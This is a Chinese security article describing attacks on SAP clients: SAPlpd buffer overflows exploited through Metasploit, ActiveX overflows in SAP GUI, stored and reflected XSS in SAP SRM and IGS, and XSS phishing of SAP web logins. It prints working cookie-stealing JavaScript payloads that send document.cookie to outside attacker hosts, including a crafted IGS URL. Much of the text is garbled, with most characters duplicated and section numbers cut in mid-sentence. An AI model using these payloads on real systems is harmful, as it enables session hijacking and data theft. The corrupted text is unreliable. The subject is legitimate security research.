SAP客戶端安全性

1、在復(fù)雜的信息安全處理過(guò)程中，最重要的任務(wù)之一就是業(yè)務(wù)應(yīng)用軟件的安全性。如今，SAP平臺(tái) 是用得最為廣泛的管理企業(yè)系統(tǒng)和存儲(chǔ)最重要的數(shù)據(jù)的平臺(tái)。遺憾的是，人們對(duì)于SAP的安全性關(guān)注卻仍顯不足。實(shí)際上，在SAP系統(tǒng)的各種級(jí)別上還有許多問(wèn) 題，如網(wǎng)絡(luò)級(jí)、業(yè)務(wù)系統(tǒng)級(jí)別、數(shù)據(jù)庫(kù)級(jí)別、應(yīng)用程序級(jí)別和表示級(jí)即SAP客戶端。關(guān)于SAP服務(wù)器安全性的文獻(xiàn)，流傳較多，但是有關(guān)SAP客戶端安全性的 介紹，卻比較少見(jiàn)。實(shí)際上，即使SAP服務(wù)器環(huán)境是安全的，只要SAP客戶端出現(xiàn)紕漏，那么根據(jù)木桶原理，整個(gè)系統(tǒng)的安全性就會(huì)潰于蟻穴。在本文中，我們要討論的就是SAP客戶端的安全性問(wèn)題。SAP客戶端不僅可能從企業(yè)網(wǎng)絡(luò)發(fā)動(dòng)攻擊

2、，而且還可能從有權(quán)訪問(wèn)SAP服務(wù)器和關(guān)鍵業(yè)務(wù)數(shù)據(jù)的企業(yè)網(wǎng)絡(luò)和用戶工作站的公共網(wǎng)絡(luò)發(fā)動(dòng)攻擊。利用溢出漏洞攻擊SAP客戶端SAP GUII是一個(gè)標(biāo)準(zhǔn)準(zhǔn)的應(yīng)用程序序，它用來(lái)連連接SAP并并使用有關(guān)數(shù)數(shù)據(jù)。在采用用了SAP的的大型公司中中，幾乎所有有的SAP客客戶端工作站站上都安裝了了這個(gè)應(yīng)用程程序。就像其它具有復(fù)復(fù)雜結(jié)構(gòu)的應(yīng)應(yīng)用程序一樣樣，這個(gè)應(yīng)用用程序也存在在許多漏洞。鑒鑒于這個(gè)應(yīng)用用程序的流行行性，在SAAPGUI中中發(fā)現(xiàn)的漏洞洞的嚴(yán)重性堪堪比IE瀏覽覽器 或者M(jìn)Microssoft oofficee軟件中的溢溢出漏洞。WWindowws基本設(shè)施施在更新方面面還是比較方方便的，同時(shí)時(shí)管理員還會(huì)會(huì)

3、收到嚴(yán)重WWindowws漏洞的通通知，但是SSAP客戶端端的 情況就就不同了。SSAP客戶端端的安全問(wèn)題題主要有兩個(gè)個(gè)，一是客戶戶端軟件沒(méi)有有自動(dòng)更新系系統(tǒng)，二是在在現(xiàn)有的問(wèn)題題和解決方法法方面的信息息還比較匱乏乏?？紤]到SAP系系統(tǒng)是通過(guò)瀏瀏覽器來(lái)訪問(wèn)問(wèn)的，所以在在SAP WWeb服務(wù)器器中存在的XXSS安全漏漏洞可能導(dǎo)致致針對(duì)SAPP客戶端的各各種攻擊，并并提高了攻擊擊SAP客戶戶端的可能性性。去年初，安全專專家已經(jīng)在SSAPlpdd和SAPspprint組組件中發(fā)現(xiàn)了了一些緩沖區(qū)區(qū)溢出漏洞。組組件SAPllpd是安裝裝在每個(gè)SAAP用戶工作作站上的客戶戶 應(yīng)用程序序SAP GGUI的一

4、部部分，運(yùn)行在在515端口口上提供打印印服務(wù)。人們們?cè)赟APllpd所使用用的協(xié)議中已已經(jīng)發(fā)現(xiàn)了許許多漏洞，這這些漏洞允許許攻擊者遠(yuǎn)程程控制有弱點(diǎn)點(diǎn)的系統(tǒng)，執(zhí)執(zhí)行 拒絕服服務(wù)攻擊，或或者停止打印印服務(wù)。這些些漏洞的詳細(xì)細(xì)情況可以從從SAP的正正式報(bào)告中找找到。主要特特點(diǎn)是，有弱弱點(diǎn)的服務(wù)端端口默認(rèn)時(shí)是是關(guān)閉的，只只有當(dāng)用戶打打印下一個(gè) 文檔時(shí)才打打開(kāi)。乍一看這個(gè)特特點(diǎn)提高了攻攻擊用戶工作作站的難度，事事實(shí)上絕非如如此?？紤]到采用SAAP的公司，一一般SAP用用戶的數(shù)量都都是數(shù)以百計(jì)計(jì)的，甚至數(shù)數(shù)以千計(jì)，所所以在給定時(shí)時(shí)刻有人打印印文檔的可能能性是非常大大的。因此，可可以編寫(xiě)一個(gè)個(gè)腳本來(lái)掃描描網(wǎng)

5、絡(luò)，尋找找開(kāi)放的端口口，并在檢測(cè)測(cè)到開(kāi)放端口口時(shí)啟動(dòng)漏洞洞利用代碼來(lái)來(lái)迅速得到有有弱點(diǎn)的用戶戶的工作站的的管理訪問(wèn)權(quán)權(quán)限。這不僅是一個(gè)理理論設(shè)想而已已，實(shí)際上做做起來(lái)也很簡(jiǎn)簡(jiǎn)單。針對(duì)特特定安全漏洞洞的漏洞利用用代碼已經(jīng)添添加到了Meetasplloit框架架中了，而 Metassploitt是可以從互互聯(lián)網(wǎng)免費(fèi)下下載的。攻擊擊者需要做的的，只是選擇擇一個(gè)將在客客戶端上使用用的shelll-codde，然后使使用db_aautopwwn模 塊添添加一列客戶戶工作站的IIP地址就行行了。如果SSAPlpdd的版本有弱弱點(diǎn)，并且用用戶在此刻啟啟動(dòng)了打印服服務(wù)，那么攻攻擊者就能夠夠得到對(duì)該用用戶的工作

6、站站的訪問(wèn)權(quán)限限 （如下圖圖所示）。實(shí)實(shí)際上，677%的SAPPGUI安裝裝都易于受到到這種攻擊的的危害。 圖 獲取對(duì)帶有有SAPlppd安全漏洞洞的SAP客客戶端的訪問(wèn)問(wèn)權(quán)限得到了用戶的工工作站命令提提示符的訪問(wèn)問(wèn)權(quán)限后，攻攻擊者就可以以做一些更出出格的事情，例例如，可以安安裝特洛伊木木馬程序來(lái)竊竊取用戶的密密碼，或者從從sapshhortcuut.inii配置文件中中讀取用戶證證書(shū)，這樣就就可以直接訪訪問(wèn)SAP服服務(wù)器和關(guān)鍵鍵業(yè)務(wù)數(shù)據(jù)了了。SAP GUII中的ActtiveX漏漏洞實(shí)際上，SAPP GUI應(yīng)應(yīng)用程序還有有許多緩沖區(qū)區(qū)溢出漏洞。我我們下面討論論SAP GGUI應(yīng)用程程序的Ac

7、ttiveX組組件中的一些些漏洞。SAAP GUII由大約10000個(gè)不同同的ActiiveX組件件構(gòu)成，而每每個(gè)ActiiveX組件件都可能存在在漏洞。為了利用這類漏漏洞，通常需需要人工介入入：用戶必須須點(diǎn)擊攻擊者者提供的鏈接接（這些鏈接接可以通過(guò)電電子郵件、即即時(shí)通訊工具具等等傳遞給給用戶），從從而導(dǎo)致瀏覽覽器中 的脆脆弱部件被利利用，這樣受受害者的命令令提示符的訪訪問(wèn)權(quán)就落入入了攻擊者手手里了。有關(guān)關(guān)數(shù)據(jù)顯示，一一般說(shuō)來(lái)會(huì)有有10%到550%的用戶戶會(huì)點(diǎn)擊攻擊擊者通過(guò)社交交工程發(fā)給 他們的惡意意鏈接。會(huì)導(dǎo)導(dǎo)致溢出攻擊擊的脆弱組件件將在受害者者瀏覽器所在在的上下文中中執(zhí)行，如果果受害者經(jīng)常

8、常在管理員權(quán)權(quán)限之下啟動(dòng)動(dòng)瀏覽器的話話，攻擊者就就獲得了相應(yīng)應(yīng)的權(quán) 限。第一個(gè)公開(kāi)的SSAP GUUI中的AcctiveXX組件弱點(diǎn)是是在20077年發(fā)布的。同同時(shí)，在kwwedit組組件中也已經(jīng)經(jīng)發(fā)現(xiàn)了一個(gè)個(gè)安全漏洞，此此外，在kwwedit rfcguuisinkk組件中還發(fā)發(fā)現(xiàn)了另一個(gè)個(gè)安全漏洞。成成功利用這些些漏洞后，攻攻擊者就會(huì)得得到客戶系統(tǒng)統(tǒng)的遠(yuǎn)程控制制權(quán)限。這些些漏洞已經(jīng)被被修補(bǔ)過(guò)了，詳詳情可以參考考 SAP的的有關(guān)通知。之之后，在其他他組件中也發(fā)發(fā)現(xiàn)了一些遠(yuǎn)遠(yuǎn)程溢出漏洞洞。 其中還還有一些漏洞洞仍未修補(bǔ)好好。2009年6月月份，又發(fā)現(xiàn)現(xiàn)了一個(gè)緩沖沖區(qū)溢出安全全漏洞。 SSapi

9、rrrfc.dlll 中的這這個(gè)安全漏洞洞與發(fā)現(xiàn)的其其他漏洞一樣樣，也可以用用來(lái)獲得對(duì)受受害者的工作作站的遠(yuǎn)程控控制權(quán)限。要想利用這個(gè)安安全漏洞，攻攻擊者可以設(shè)設(shè)計(jì)一個(gè)HTTML頁(yè)面，用用該頁(yè)面來(lái)加加載有弱點(diǎn)的的ActivveX組件SSAPIrRRfc，然后后向其發(fā)送一一行大小超過(guò)過(guò)720字節(jié)節(jié)的參數(shù)來(lái)接接管它。一旦用戶點(diǎn)擊了了該鏈接，那那么就會(huì)引起起針對(duì)用戶的的工作站的拒拒絕服務(wù)攻擊擊，或者在用用戶的工作站站上執(zhí)行遠(yuǎn)程程代碼。在這這里，您將看看到一個(gè)會(huì)導(dǎo)導(dǎo)致拒絕服務(wù)務(wù)的概念性驗(yàn)驗(yàn)證代碼，如如圖所示：總起來(lái)說(shuō)，以下下因素增加了了該攻擊的危危險(xiǎn)程度：1.在rfcgguisinnk、kwediit

10、和WebbVieweer3D中發(fā)發(fā)現(xiàn)的許多漏漏洞都有現(xiàn)成成的攻擊代碼碼可用，并且且許多已經(jīng)包包含在 Meetasplloit中了了。所以攻擊擊者需要做的的只是選擇一一個(gè)shelll-codde，找到用用戶電子郵件件地址，然后后向其發(fā)送含含有鏈接的電電子郵件，其其中的鏈接指指 向攻擊者者的使用了脆脆弱組件的站站點(diǎn)。 從而而有可能收到到大數(shù)量企業(yè)業(yè)工作站上的的shelll。2.在組件saapirrffc.dlll中發(fā)現(xiàn)的安安全漏洞已經(jīng)經(jīng)在SAP GUI 77.10版本本中得到了修修補(bǔ)。 但是是，對(duì)于6.2和6.44版本來(lái)說(shuō)，還還沒(méi)有補(bǔ)丁可可用，所以建建議升級(jí)到77.1版本。 考慮到目前前6.2和6

11、6.4版本占占用戶工作站站的10%和和50%（版版本7.1的的用戶工作站站占剩下的440%），所所以大部分的的公司用戶仍仍然生活在這這些攻擊的威威脅之 下。3.除了使用郵郵件或者即時(shí)時(shí)通訊工具之之外，變通的的攻擊辦法是是，攻擊者可可以在企業(yè)文文檔流通系統(tǒng)統(tǒng)例如SAPP CFollders中中創(chuàng)建惡意的的html文文檔。 在這這種情況下，人人們對(duì)該文檔檔的信任程度度會(huì)明顯高于于郵件或者即即時(shí)通訊工具具，但是在內(nèi)內(nèi)部系統(tǒng)中上上載文檔相對(duì)對(duì)來(lái)說(shuō)要更困困難一些。利用SAP WWeb應(yīng)用程程序服務(wù)器漏漏洞攻擊SAAP客戶端目前，越來(lái)越多多的SAP系系統(tǒng)通過(guò)weeb進(jìn)行傳輸輸，像SAPP Enteerpr

12、isse Porrtal、SSAP SRRM 、SAAP CRMM 以及許多多其他組件等等等。 一些些程序允許通通過(guò)瀏覽器來(lái)來(lái)使用SAPP系統(tǒng)的各種種功能，并且且SAP應(yīng)用用程序看起來(lái)來(lái)跟普遍的Weeb應(yīng)用程序序沒(méi)什么兩樣樣。然而，即即使底部的SSAP平臺(tái) NetWeeaver也也是構(gòu)建于不不同的Webb服務(wù)之上一一個(gè)應(yīng)用程序序服務(wù)器而已已。即使在無(wú)無(wú)需額外的組組件的默認(rèn)配配置下，SAAP NettWeaveer也帶有若若干漏洞。盡管這些漏洞都都是在Webb服務(wù)器中發(fā)發(fā)現(xiàn)的，但是是攻擊的對(duì)象象卻是SAPP客戶端。因因此，談及SSAP客戶端端的安全時(shí)，必必須提到在WWeb應(yīng)用程程序中的典型型客戶

13、端漏洞洞。關(guān)于SAAP客戶端，我我們關(guān)心的漏漏洞有：HTML代碼注注入漏洞或者者存儲(chǔ)式XSSS；反射式XSS；釣魚(yú)攻擊或身份份驗(yàn)證數(shù)據(jù)攔攔截；HTML代碼注注入漏洞以及及存儲(chǔ)式XSSS下面讓我們考察察在應(yīng)用程序序SAP SSRM（該應(yīng)應(yīng)用程序用于于遠(yuǎn)程供應(yīng)商商）中的一個(gè)個(gè)html注注入安全漏洞洞(也稱為存存儲(chǔ)式XSSS)的例子。SAP SRMM系統(tǒng)允許創(chuàng)創(chuàng)建含有任何何數(shù)據(jù)的HTTML文檔，并并將該文檔放放置到采購(gòu)方方的Geneeral文件件夾中。因此此，經(jīng)過(guò)身份份驗(yàn)證的系統(tǒng)統(tǒng)用戶(供應(yīng)應(yīng)方）就可以以發(fā)動(dòng)存 儲(chǔ)儲(chǔ)式XSS攻攻擊。 攻擊擊假設(shè)把惡意意代碼注入到到入口頁(yè)面中中。例如，通通常買(mǎi)方是可可

14、以訪問(wèn)文檔檔交換文件夾夾的。買(mǎi)方萬(wàn)萬(wàn)一成功查看看了這個(gè)頁(yè)面面，他的會(huì)話話證書(shū)(Coookie)就會(huì)被攔 截，并轉(zhuǎn)發(fā)發(fā)給攻擊者的的站點(diǎn)。 作為一一個(gè)例子，可可以使用以下下HTML文文件：doccumentt.locaation.href=httpp:/dsserg.ccom/?+docuument.cookiie;由于SAP SSRM的用戶戶會(huì)話沒(méi)有綁綁定IP地址址，所以攻擊擊者可以使用用他的coookie連接接到用戶環(huán)境境，并獲得其其他供應(yīng)商的的文檔的權(quán)限限以及管理系系統(tǒng)功能的權(quán)權(quán)限。 這個(gè)個(gè)漏洞不是唯唯一的，關(guān)于于相似的漏洞洞的詳情可以以在官員通報(bào)報(bào)中找到。在在這個(gè)通報(bào)中中描述的漏洞洞允許在

15、入口口頁(yè)面里注入入任何HTMML和JavvaScriipt，從而而 獲得對(duì)其其他用戶的會(huì)會(huì)話的訪問(wèn)權(quán)權(quán)限。還記得前面介紹紹的SAPGGUI AcctiveXX組件中的漏漏洞吧，如果果跟這里的漏漏洞相結(jié)合，就就會(huì)得到一種種新的攻擊形形式。這時(shí)，要要求加載HTTML頁(yè)面來(lái)來(lái)調(diào)用一個(gè)有有弱點(diǎn)的AcctiveXX組件。 在在這種情況下下，如果公司司的雇員打開(kāi)開(kāi)了我們的文文檔，那么我我們就能夠訪訪問(wèn)他的工作作站了，從而而為我們進(jìn)一一步攻擊企業(yè)業(yè)網(wǎng)絡(luò)打下了了基礎(chǔ)。反射式XSS就像前面提到的的那樣，甚至至在標(biāo)準(zhǔn)應(yīng)用用程序SAPP NetWWeaverr中也存在許許多的安全漏漏洞，所以更更不要說(shuō)其它它的組件了

16、。據(jù)據(jù)安全研究人人員稱，在各各種SAP應(yīng)應(yīng)用程序中現(xiàn)現(xiàn)已公布了的的安全漏洞就就有20個(gè)左左右。 這只只是已經(jīng)公開(kāi)開(kāi)的，至于那那些尚未公之之于眾的，我我們就不得而而知了。就像前面介紹的的SAP SSRM中的安安全漏洞一樣樣，我們將考考察在另一個(gè)個(gè)應(yīng)用程序SSAP IGGS中的一些些安全漏洞。對(duì)對(duì)于這些漏洞洞，攻擊者必必須創(chuàng)建一個(gè)個(gè)鏈接，如下下所示：http:/serveer:401180/ADDM:GETTLOGFIILE?PAARAMS=dooucmennt.loccationn.hreff=htttp:/ddserg.ru/?+docuument.cookiie;然后，攻擊者必必須發(fā)給受害害

17、者并得到他他的cookkie。在標(biāo)標(biāo)準(zhǔn)SAP環(huán)環(huán)境和其它組組件中，像這這樣的安全漏漏洞還有很多多，在此不作作一一介紹。利用XSS“釣釣取”身份驗(yàn)驗(yàn)證數(shù)據(jù)利用XSS安全全漏洞，還有有可能利用釣釣魚(yú)攻擊來(lái)嗅嗅探用戶的身身份驗(yàn)證數(shù)據(jù)據(jù)。在SAPP Web應(yīng)應(yīng)用程序服務(wù)務(wù)器中就發(fā)現(xiàn)現(xiàn)了這樣的XXSS安全漏漏洞，而SAAP Webb應(yīng)用程序服服務(wù)器則是整整個(gè)SAP系系統(tǒng)的基礎(chǔ)。之之所以出現(xiàn)這這個(gè)安全漏洞洞，是因?yàn)閷?duì)對(duì)通過(guò)webb登錄到SAAP系統(tǒng)時(shí)的的URL中用用來(lái)表示標(biāo)準(zhǔn)準(zhǔn)接口的 ssap/bcc/gui/saap/itss/webggui/沒(méi)有有進(jìn)行嚴(yán)格的的過(guò)濾所導(dǎo)致致的。這個(gè)XSS安全全漏洞允許在

18、在URL中注注入JavaaScrippt代碼，用用這樣的方式式，可以把用用戶和密碼輸輸入表單之后后的內(nèi)容注入入到頁(yè)面的源源代碼中。所所以， 它實(shí)實(shí)際是注入了了修改標(biāo)準(zhǔn)輸輸入字段的代代碼，并在按按下提交按鈕鈕的時(shí)候把用用戶輸入的數(shù)數(shù)據(jù)轉(zhuǎn)移到攻攻擊者控制之之下的站點(diǎn)上上了。 下面面是頁(yè)面的原原始代碼片段段：.HERE IS THE INPUT FORMS.HERE IS THE SUBMIT BUTTON就像看到的那樣樣，我們可以以利用注入的的代碼改寫(xiě)輸輸入表單。為為了實(shí)現(xiàn)這種種攻擊，攻擊擊者必須向潛潛在的受害者者發(fā)送如下所所示的一個(gè)鏈鏈接：http:/sapseerver:8000/sap/bbe/guii/sap/its/wwebguii? XSSS codde whiich wiill ovverwriite sttandarrd